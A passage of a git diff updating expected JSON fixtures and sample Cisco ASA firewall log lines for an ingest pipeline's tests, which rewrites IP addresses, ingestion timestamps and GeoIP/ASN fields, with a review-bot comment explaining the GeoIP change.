2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", + "ingested": "2021-12-09T13:32:11.535189900Z", + "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", "action": "firewall-rule", @@ -3425,8 +3425,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" 
@@ -3451,14 +3451,14 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.673325801Z", - "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.0.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", + "ingested": "2021-12-09T13:32:11.535193800Z", + "original": "Dec 11 2018 08:01:38 \u003cIP\u003e: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.222/1234 to 192.168.1.34/5679 flags RST on interface outside", "code": "106015", "kind": "event", "action": "firewall-rule", @@ -3486,8 +3486,8 @@ }, "destination": { "port": 5000, - "address": "192.0.0.12", - "ip": "192.0.0.12" + "address": "192.168.0.12", + "ip": "192.168.0.12" }, "source": { "port": 5679, @@ -3523,13 +3523,13 @@ "related": { "ip": [ "192.168.1.34", - "192.0.0.12" + "192.168.0.12" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.673327545Z", - "original": "Dec 11 2018 08:01:39 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.0.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", + "ingested": "2021-12-09T13:32:11.535198400Z", + "original": "Dec 11 2018 08:01:39 \u003cIP\u003e: %ASA-4-106023: Deny udp src dmz:192.168.1.34/5679 dst outside:192.168.0.12/5000 by access-group \"dmz\" [0x123a465e, 0x8c20f21]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -3564,8 +3564,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" 
@@ -3596,14 +3596,14 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.673329741Z", - "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", + "ingested": "2021-12-09T13:32:11.535204300Z", + "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3619,7 +3619,7 @@ "destination_interface": "dmz", "mapped_source_port": 1234, "mapped_destination_ip": "192.168.1.34", - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447237", "source_interface": "outside", "mapped_destination_port": 65000 @@ -3640,8 +3640,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3672,14 +3672,14 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "192.168.1.34" ] }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:19.673331489Z", - "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.0.2.222/1234 (192.0.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", + "ingested": "2021-12-09T13:32:11.535208900Z", + "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)", "code": "302013", "kind": "event", "action": "firewall-rule", 
@@ -3695,7 +3695,7 @@ "destination_interface": "dmz", "mapped_source_port": 1234, "mapped_destination_ip": "192.168.1.34", - "mapped_source_ip": "192.0.2.222", + "mapped_source_ip": "192.168.2.222", "connection_id": "447237", "source_interface": "outside", "mapped_destination_port": 65000 @@ -3716,8 +3716,8 @@ }, "source": { "port": 1234, - "address": "192.0.2.222", - "ip": "192.0.2.222" + "address": "192.168.2.222", + "ip": "192.168.2.222" }, "tags": [ "preserve_original_event" @@ -3748,7 +3748,7 @@ }, "related": { "ip": [ - "192.0.2.222", + "192.168.2.222", "10.10.10.10" ] }, @@ -3756,8 +3756,8 @@ "severity": 6, "duration": 86399000000000, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:19.673333295Z", - "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447237 for outside:192.0.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", + "ingested": "2021-12-09T13:32:11.535213500Z", + "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs", "code": "302014", "kind": "event", "start": "2018-12-10T08:01:54.000Z", @@ -3829,7 +3829,7 @@ "event": { "severity": 6, "duration": 122000000000, - "ingested": "2021-07-19T09:06:19.673335095Z", + "ingested": "2021-12-09T13:32:11.535217400Z", "original": "Aug 15 2012 23:30:09 : %ASA-6-302016 Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416", "code": "302016", "kind": "event", @@ -3857,8 +3857,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -3888,7 +3888,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { 
@@ -3896,8 +3896,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.673336875Z", - "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:32:11.535222200Z", + "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -3921,8 +3921,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -3952,7 +3952,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -3960,8 +3960,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.673338607Z", - "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:32:11.535226500Z", + "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -3985,8 +3985,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -4016,7 +4016,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { 
@@ -4024,8 +4024,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.673340382Z", - "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:32:11.535231100Z", + "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4049,8 +4049,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.47", - "ip": "192.88.99.47" + "address": "192.168.99.47", + "ip": "192.168.99.47" }, "source": { "address": "0.0.0.0", @@ -4080,7 +4080,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.47" + "192.168.99.47" ] }, "host": { @@ -4088,8 +4088,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.673342142Z", - "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.47 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:32:11.535236Z", + "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4113,8 +4113,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4144,7 +4144,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { 
@@ -4152,8 +4152,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.673343970Z", - "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:32:11.535258400Z", + "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4177,8 +4177,8 @@ "level": "critical" }, "destination": { - "address": "192.88.99.57", - "ip": "192.88.99.57" + "address": "192.168.99.57", + "ip": "192.168.99.57" }, "source": { "address": "0.0.0.0", @@ -4208,7 +4208,7 @@ ], "ip": [ "0.0.0.0", - "192.88.99.57" + "192.168.99.57" ] }, "host": { @@ -4216,8 +4216,8 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.673345870Z", - "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.88.99.57 on interface Mobile_Traffic", + "ingested": "2021-12-09T13:32:11.535263300Z", + "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic", "code": "106016", "kind": "event", "action": "firewall-rule", @@ -4280,7 +4280,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.673347696Z", + "ingested": "2021-12-09T13:32:11.535269400Z", "original": "Sep 12 2014 06:52:48 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", @@ -4344,7 +4344,7 @@ }, "event": { "severity": 2, - "ingested": "2021-07-19T09:06:19.673349429Z", + "ingested": "2021-12-09T13:32:11.535273900Z", "original": "Sep 12 2014 06:53:00 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic", "code": "106016", "kind": "event", 
@@ -4375,8 +4375,8 @@ }, "source": { "port": 24069, - "address": "192.0.2.95", - "ip": "192.0.2.95" + "address": "192.168.2.95", + "ip": "192.168.2.95" }, "tags": [ "preserve_original_event" @@ -4410,7 +4410,7 @@ "GIFRCHN01" ], "ip": [ - "192.0.2.95", + "192.168.2.95", "10.32.112.125" ] }, @@ -4419,8 +4419,8 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.673351166Z", - "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.0.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", + "ingested": "2021-12-09T13:32:11.535278800Z", + "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -4484,7 +4484,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-19T09:06:19.673353847Z", + "ingested": "2021-12-09T13:32:11.535300500Z", "original": "Sep 12 2014 06:53:02 GIFRCHN01 : %ASA-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside", "code": "313001", "kind": "event", @@ -4547,7 +4547,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.673448562Z", + "ingested": "2021-12-09T13:32:11.535306100Z", "original": "Jan 14 2015 13:16:13: %ASA-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session", "code": "313004", "kind": "event", @@ -4576,15 +4576,15 @@ "level": "warning" }, "destination": { - "address": "192.88.99.129", + "address": "192.168.99.129", "port": 80, "domain": "bad.example.com", - "ip": "192.88.99.129" + "ip": "192.168.99.129" }, "source": { "nat": { "port": 7890, - "ip": "192.88.99.1" + "ip": "192.168.99.1" }, "address": "10.1.1.45", "port": 6798, 
@@ -4622,14 +4622,14 @@ ], "ip": [ "10.1.1.45", - "192.88.99.1", - "192.88.99.129" + "192.168.99.1", + "192.168.99.129" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.673454555Z", - "original": "Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.88.99.1/7890) to outside:192.88.99.129/80 (192.88.99.129/80), destination 192.88.99.129 resolved from dynamic list: bad.example.com", + "ingested": "2021-12-09T13:32:11.535311500Z", + "original": "Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com", "code": "338002", "kind": "event", "action": "firewall-rule", @@ -4646,8 +4646,8 @@ "asa": { "destination_interface": "outside", "mapped_source_port": 7890, - "mapped_destination_ip": "192.88.99.129", - "mapped_source_ip": "192.88.99.1", + "mapped_destination_ip": "192.168.99.129", + "mapped_source_ip": "192.168.99.1", "rule_name": "dynamic", "source_interface": "inside", "mapped_destination_port": 80 @@ -4660,8 +4660,8 @@ }, "destination": { "port": 80, - "address": "192.0.2.223", - "ip": "192.0.2.223" + "address": "192.168.2.223", + "ip": "192.168.2.223" }, "source": { "nat": { 
@@ -4701,13 +4701,13 @@ "ip": [ "10.1.1.1", "10.2.1.1", - "192.0.2.223" + "192.168.2.223" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.673457311Z", - "original": "Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware", + "ingested": "2021-12-09T13:32:11.535315800Z", + "original": "Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338004", "kind": "event", "action": "firewall-rule", @@ -4724,7 +4724,7 @@ "destination_interface": "outsidet", "mapped_source_port": 33340, "threat_level": "very-high", - "mapped_destination_ip": "192.0.2.223", + "mapped_destination_ip": "192.168.2.223", "mapped_source_ip": "10.2.1.1", "rule_name": "dynamic", "source_interface": "inside", @@ -4739,8 +4739,8 @@ }, "destination": { "port": 80, - "address": "192.0.2.223", - "ip": "192.0.2.223" + "address": "192.168.2.223", + "ip": "192.168.2.223" }, "source": { "nat": { 
@@ -4780,13 +4780,13 @@ "ip": [ "10.1.1.1", "10.2.1.1", - "192.0.2.223" + "192.168.2.223" ] }, "event": { "severity": 4, - "ingested": "2021-07-19T09:06:19.673459727Z", - "original": "Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.0.2.223/80 (192.0.2.223/80), destination 192.0.2.223 resolved from dynamic list: 192.0.2.223/255.255.255.255, threat-level: very-high, category: Malware", + "ingested": "2021-12-09T13:32:11.535320300Z", + "original": "Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware", "code": "338008", "kind": "event", "action": "firewall-rule", @@ -4804,7 +4804,7 @@ "destination_interface": "outsidet", "mapped_source_port": 33340, "threat_level": "very-high", - "mapped_destination_ip": "192.0.2.223", + "mapped_destination_ip": "192.168.2.223", "mapped_source_ip": "10.2.1.1", "rule_name": "dynamic", "source_interface": "inside", @@ -4818,8 +4818,8 @@ "level": "notification" }, "destination": { - "address": "192.0.2.1", - "ip": "192.0.2.1" + "address": "192.168.2.1", + "ip": "192.168.2.1" }, "source": { "address": "10.30.30.30", @@ -4844,13 +4844,13 @@ "related": { "ip": [ "10.30.30.30", - "192.0.2.1" + "192.168.2.1" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.673489272Z", - "original": "Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.0.2.1:/app", + "ingested": "2021-12-09T13:32:11.535325700Z", + "original": "Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app", "code": "304001", "kind": "event", "action": "firewall-rule", 
@@ -4872,8 +4872,8 @@ "level": "notification" }, "destination": { - "address": "192.0.2.32", - "ip": "192.0.2.32" + "address": "192.168.2.32", + "ip": "192.168.2.32" }, "source": { "address": "10.5.111.32", @@ -4900,13 +4900,13 @@ "related": { "ip": [ "10.5.111.32", - "192.0.2.32" + "192.168.2.32" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.673495577Z", - "original": "Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.0.2.32:http://example.com", + "ingested": "2021-12-09T13:32:11.535330500Z", + "original": "Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com", "code": "304001", "kind": "event", "action": "firewall-rule", @@ -4928,8 +4928,8 @@ "level": "notification" }, "destination": { - "address": "192.0.0.19", - "ip": "192.0.0.19" + "address": "192.168.0.19", + "ip": "192.168.0.19" }, "source": { "address": "10.69.6.39", @@ -4962,13 +4962,13 @@ "related": { "ip": [ "10.69.6.39", - "192.0.0.19" + "192.168.0.19" ] }, "event": { "severity": 5, - "ingested": "2021-07-19T09:06:19.673498923Z", - "original": "Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.0.0.19 on interface inside", + "ingested": "2021-12-09T13:32:11.535334400Z", + "original": "Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside", "code": "304002", "kind": "event", "action": "firewall-rule", 
@@ -4994,26 +4994,32 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "RU-MOW",
- "city_name": "Moscow",
- "country_iso_code": "RU",
- "country_name": "Russia",
- "region_name": "Moscow",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 37.6172,
- "lat": 55.7527
+ "lon": -1.3614,
+ "lat": 51.7095
 }
 },
- "address": "1.2.3.4",
+ "as": {
+ "number": 20712,
+ "organization": {
+ "name": "Andrews \u0026 Arnold Ltd"
+ }
+ },
+ "address": "81.2.69.144",
 "port": 80,
 "user": {
 "name": "username"
 },
- "ip": "1.2.3.4"
+ "ip": "81.2.69.144"
 },
 "source": {
 "nat": {
- "ip": "1.2.3.4"
+ "ip": "81.2.69.144"
 },
 "address": "10.2.3.4",
 "port": 49926,
@@ -5052,13 +5058,13 @@
 ],
 "ip": [
 "10.2.3.4",
- "1.2.3.4"
+ "81.2.69.144"
 ]
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:19.673501322Z",
- "original": "Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (1.2.3.4/49926)(LOCAL\\username) to vlan-42:1.2.3.4/80 (1.2.3.4/80) (username)",
+ "ingested": "2021-12-09T13:32:11.535339100Z",
+ "original": "Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (81.2.69.144/49926)(LOCAL\\username) to vlan-42:81.2.69.144/80 (81.2.69.144/80) (username)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -5073,8 +5079,8 @@
 "asa": {
 "destination_interface": "vlan-42",
 "mapped_source_port": 49926,
- "mapped_destination_ip": "1.2.3.4",
- "mapped_source_ip": "1.2.3.4",
+ "mapped_destination_ip": "81.2.69.144",
+ "mapped_source_ip": "81.2.69.144",
 "connection_id": "27215708",
 "source_interface": "internet",
 "mapped_destination_port": 80,
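Review bot: The new expected values in the first hunk here — `"city_name": "Abingdon"`, `"region_iso_code": "GB-OXF"`, `"number": 20712`, `"name": "Andrews \u0026 Arnold Ltd"` — tie this fixture to the contents of the GeoIP/ASN database the test runner ships with, and 81.2.69.144 is a genuinely allocated public address rather than the 1.2.3.4 and RFC 5737 192.0.2.x values it replaces. That appears to be the intent of the change, but nothing in the fixture records it; a line in the data stream's test README or test config such as `# 81.2.69.144 is taken from the bundled GeoIP test database; the geo/as fields in the expected output depend on its contents` would save the next maintainer from re-deriving why this one event has geo data while the 192.168.x.x events in the earlier hunks do not. If the bundled database is ever updated, these six fields and the `as` object are the ones that will need regenerating.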
diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa-fix.log-expected.json
index e73b9c05db6..d8a0285afc9 100644
--- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa-fix.log-expected.json
+++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa-fix.log-expected.json
@@ -57,7 +57,7 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:24.775064690Z",
+ "ingested": "2021-12-09T13:32:19.965226800Z",
 "original": "Apr 17 2020 14:08:08 SNL-ASA-VPN-A01 : %ASA-6-302016: Teardown UDP connection 110577675 for Outside:10.123.123.123/53723(LOCAL\\Elastic) to Inside:10.233.123.123/53 duration 0:00:00 bytes 148 (zzzzzz)",
 "code": "302016",
 "kind": "event",
@@ -134,7 +134,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:24.775070482Z",
+ "ingested": "2021-12-09T13:32:19.965230800Z",
 "original": "Apr 17 2020 14:00:31 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny icmp src Inside:10.123.123.123 dst Outside:10.123.123.123 (type 11, code 0) by access-group \"Inside_access_in\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -203,7 +203,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:24.775072629Z",
+ "ingested": "2021-12-09T13:32:19.965235200Z",
 "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.123.123.123/6316 dst outside:10.123.123.123/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3afb522, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -279,7 +279,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-07-19T09:06:24.775074513Z",
+ "ingested": "2021-12-09T13:32:19.965239100Z",
 "original": "Apr 17 2020 14:16:20 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny udp src Inside:10.123.123.123/57621(LOCAL\\Elastic) dst Outside:10.123.123.123/57621 by access-group \"Inside_access_in\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -340,7 +340,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-07-19T09:06:24.775076252Z",
+ "ingested": "2021-12-09T13:32:19.965242900Z",
 "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-2-106017: Deny IP due to Land Attack from 10.123.123.123 to 10.123.123.123",
 "code": "106017",
 "kind": "event",
diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log
index 9f0a0b8b598..5d21ffa5a9f 100644
--- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log
+++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log
@@ -1,268 +1,268 @@ -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:100.66.205.104/80 (100.66.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for 
outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 